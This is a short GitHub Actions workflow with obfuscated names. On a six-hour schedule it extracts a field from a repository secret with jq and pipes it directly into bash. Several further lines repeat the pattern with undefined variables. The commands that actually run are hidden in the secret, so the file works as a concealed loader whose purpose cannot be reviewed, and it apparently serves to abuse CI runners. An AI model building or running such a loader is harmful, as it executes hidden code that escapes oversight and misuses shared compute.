name: bohaocatan

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bohaocatan
        env:
          zdn6: ${{ secrets.zdn6 }}
        run: |
          echo $zdn6 | jq -r .ta5 | /bin/bash
          echo $f99 | jq -r .x58891 | /bin/bash
          echo $n426 | jq -r .w4 | /bin/bash
          echo $alfr4 | jq -r .boz0 | /bin/bash
          echo $e561 | jq -r .pa9945 | /bin/bash
          echo $dow92658 | jq -r .bhyrq1348 | /bin/bash

